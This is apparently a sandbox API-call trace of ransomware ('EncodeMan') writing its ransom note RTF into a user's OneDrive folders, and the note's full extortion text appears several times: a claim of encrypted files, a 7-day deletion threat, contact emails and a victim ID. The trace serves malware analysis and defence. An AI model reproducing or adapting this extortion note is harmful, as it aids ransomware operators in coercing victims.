D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\nú¯Õ%\x048èõù^=«\x16O\x1fïж>\x9bXË\x7fÓ\r", lpUsedDefaultChar=0x0) returned 8717 [0294.919] WriteFile (in: hFile=0x2ec, lpBuffer=0x1ef9b08*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x1ef9b08*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0294.921] CloseHandle (hObject=0x2ec) returned 1 [0294.921] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\#readme_eman#.rtf")) returned 0xffffffff [0294.921] GetLastError () returned 0x2 [0294.921] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Microsoft\\OneDrive\\17.3.6998.0830\\fa\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\microsoft\\onedrive\\17.3.6998.0830\\fa\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x228 [0295.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.440] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0295.441] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x236ff98, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 